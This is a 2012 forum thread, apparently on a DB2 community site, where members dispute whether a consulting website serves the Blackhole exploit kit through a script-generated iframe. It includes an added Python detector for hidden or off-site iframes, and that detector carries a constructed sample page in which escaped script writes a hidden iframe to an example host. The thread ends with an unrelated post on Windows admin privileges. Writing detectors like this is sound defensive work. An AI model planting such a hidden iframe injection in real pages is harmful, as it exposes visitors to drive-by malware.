
05-09-12, 17:46
|
|
:-)
|
|
Join Date: Jun 2003
Location: Toronto, Canada
Posts: 5,031
|
|
|
|
Quote:
Originally Posted by db2topgun
The site is virus-free.
|
I wouldn't be so sure. Try wget h t t p://www.db2topgun.com (remove extra blanks, obviously) and see for yourself what HTML is being served. The iframe generated by the script on that page tries to launch what is known as Blackhole exploit kit from a known malware site.
I'm attaching the HTML source (renamed as .txt so that you don't launch it by mistake).
[
Moderation Comment:
Attachment removed in response to copyright claim by db2topgun.
]
|
Last edited by sathyaram_s; 05-15-12 at 05:53.
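
An added example, not part of the original post or of the attachment that was removed: a static check of saved HTML (such as what wget retrieves) for hidden or off-site iframes, including ones that an inline script would write at load time. The sample page, host names and function names are constructed for illustration, and the check assumes the script's payload is only %XX-escaped.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed sample (not the page from the thread): a script writes a hidden
# off-site iframe at load time. Hosts are reserved example domains.
SAMPLE = """<html><body><iframe src="/about.html" width="600" height="400"></iframe>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A//ads.example.net/in.php%22%20width%3D%221%22%20height%3D%221%22%20style%3D%22visibility%3Ahidden%22%3E%3C/iframe%3E"));</script>
</body></html>"""

class FrameFinder(HTMLParser):
    """Collects iframe attributes and inline script bodies."""
    def __init__(self):
        super().__init__()
        self.frames, self.scripts, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append(dict(attrs))
        elif tag == "script":
            self.scripts.append("")
            self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def suspicious(attrs, page_host):
    """Reasons an iframe looks injected: tiny, hidden, or served from another host."""
    why = []
    if attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1"):
        why.append("tiny")
    if re.search(r"visibility\s*:\s*hidden|display\s*:\s*none", attrs.get("style") or "", re.I):
        why.append("hidden")
    host = urlparse(attrs.get("src") or "").hostname
    if host and host != page_host:
        why.append("off-site:" + host)
    return why

def scan(html, page_host):
    """Flag static iframes and iframes that inline scripts would write."""
    top = FrameFinder(); top.feed(html); top.close()
    found = [("static", f.get("src"), suspicious(f, page_host)) for f in top.frames]
    for body in top.scripts:
        # Undo %XX escaping, then parse the markup the script would emit.
        inner = FrameFinder(); inner.feed(unquote(body)); inner.close()
        found += [("script-generated", f.get("src"), suspicious(f, page_host)) for f in inner.frames]
    return [f for f in found if f[2]]
```

Calling `scan(SAMPLE, "www.example.com")` reports only the script-generated frame; the ordinary same-site iframe is not flagged.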
|

05-09-12, 18:14
|
|
Registered User
|
|
Join Date: Aug 2009
Posts: 23
|
|
|
Last edited by LD_Bronstein; 05-14-12 at 08:19.
|

05-09-12, 18:37
|
|
:-)
|
|
Join Date: Jun 2003
Location: Toronto, Canada
Posts: 5,031
|
|
|
|
Arrogance is no substitute for problem determination skills. You probably call it "self-confidence" though. Feel free to ignore the obvious, Mr. whatever-your-real-name-is.
|
|

05-09-12, 20:10
|
|
Registered User
|
|
Join Date: Aug 2009
Posts: 23
|
|
|
Last edited by LD_Bronstein; 05-14-12 at 08:18.
|

05-10-12, 06:44
|
|
∞∞∞∞∞∞
|
|
Join Date: Aug 2008
Location: Toronto, Canada
Posts: 2,180
|
|
Comrade Bronstein, n_i was just trying to help. Please don't insult him.
|
|

05-10-12, 10:08
|
|
Registered User
|
|
Join Date: Oct 2004
Posts: 268
|
|
For those who say the site was clean, see attached. Sorry for being too harsh but I am on edge with the company. One more virus I get, I am out the door.
|
Last edited by mdx34; 05-10-12 at 10:12.
|

05-10-12, 10:37
|
|
:-)
|
|
Join Date: Jun 2003
Location: Toronto, Canada
Posts: 5,031
|
|
Quote:
Originally Posted by LD_Bronstein
I was contracted by the company that owns the subject web site to build content.
|
Ah, this is a case of pride being hurt, I see now. I wonder how you were able to deliver "a quality product" without being able to understand HTML code that I included in my post specifically to substantiate my finding, but that's between you and your client, or should I say victim.
Good luck in your endeavours.
|
|

05-10-12, 11:25
|
|
∞∞∞∞∞∞
|
|
Join Date: Aug 2008
Location: Toronto, Canada
Posts: 2,180
|
|
Quote:
Originally Posted by mdx34
For those who say the site was clean, see attached. Sorry for being too harsh but I am on edge with the company. One more virus I get, I am out the door.
|
How do you know you got it from visiting this site? I didn't get a virus / virus warning (have Symantec as well)
|
|

05-10-12, 12:00
|
|
Registered User
|
|
Join Date: Oct 2004
Posts: 268
|
|
Quote:
Originally Posted by db2girl
How do you know you got it from visiting this site? I didn't get a virus / virus warning (have Symantec as well)
|
With the settings of the proxy and antivirus we have, it will give you an immediate pop-up window with a message indicating you received a virus. I was only at the db2forum site looking at your post and clicked on the link you provided when I got the pop-up. I had no other Internet session opened at the time.
|
|

05-11-12, 14:02
|
|
Registered User
|
|
Join Date: Oct 2009
Location: 221B Baker St.
Posts: 483
|
|
|
db2topgun - virus?
Quote:
|
How do you know you got it from visiting this site?
|
This was the only url i had not previously visited. The day after visiting db2topgun, i logged on to a bank and was asked to fill out an "authorization required" form that asked for all kinds of info no bank would ever ask online. . .
The bank's security/fraud folks told me that this has happened all too often.
This link shows what looks just like what happened to my pc:
A Cave Monster from Hell Wants Your Financial Data « Webroot Threat Blog
As far as i know, this link has no problems. . .<g>
|
|

05-11-12, 14:17
|
|
∞∞∞∞∞∞
|
|
Join Date: Aug 2008
Location: Toronto, Canada
Posts: 2,180
|
|
I tried from my home computer (with a different antivirus software) 2 days ago and it was ok (didn't want to try from the one with no antivirus).
|
|

05-11-12, 14:26
|
|
Registered User
|
|
Join Date: Oct 2009
Location: 221B Baker St.
Posts: 483
|
|
|
db2topgun virus?
Just did a search to see if there was anything about the topgun site. This was the info for the first link returned:
DB2 TOP GUN Consulting
Warning: Dangerous Downloads
Call DB2 Top Gun first for any of your DB2 database support needs. We promise to make you glad you did. Call us at 775-285-6767 or email at info@db2topgun.com
db2topgun.com
Kinda spooky when an internet search flags the site. . .
|
|

05-11-12, 14:35
|
|
∞∞∞∞∞∞
|
|
Join Date: Aug 2008
Location: Toronto, Canada
Posts: 2,180
|
|
Use google instead of yahoo. Just kidding... You can email the owner of this site if you like.
|
|

05-11-12, 15:52
|
|
Registered User
|
|
Join Date: Oct 2009
Location: 221B Baker St.
Posts: 483
|
|
|
db2topgun virus?
Yup, did that earlier - i'll probably send another with the result from the search.
|
|

06-12-12, 16:12
|
|
∞∞∞∞∞∞
|
|
Join Date: Aug 2008
Location: Toronto, Canada
Posts: 2,180
|
|
Quote:
Originally Posted by n_i
Read about extended security on Windows. If it's on, the members of DB2ADMNS have administrative privileges. If not, all local administrators plus whoever is in SYSADM_GROUP.
You will still be able to start and stop the instance even without SYSADM privileges - even POWER USERS may be sufficient to start the DB2 service.
There's another gotcha - after the installation the DB2 service will be logging in as db2admin (or whatever name you provide). If ever db2admin's password expires, the instance won't start. It is common practice to change the DB2 service login to Local System (login ID SYSTEM), which does not require a password.
|
I set sysadm_group to DB2ADMNS and made two users (my personal id and db2admin) part of this group. Verified that the developers don't have sysadm. But all of them are administrators on this Win server, so they can easily add themselves to this group... not good, they can do enough damage if they want to. Don't think we can do anything about this ...unless they get removed from the administrator group?
|
|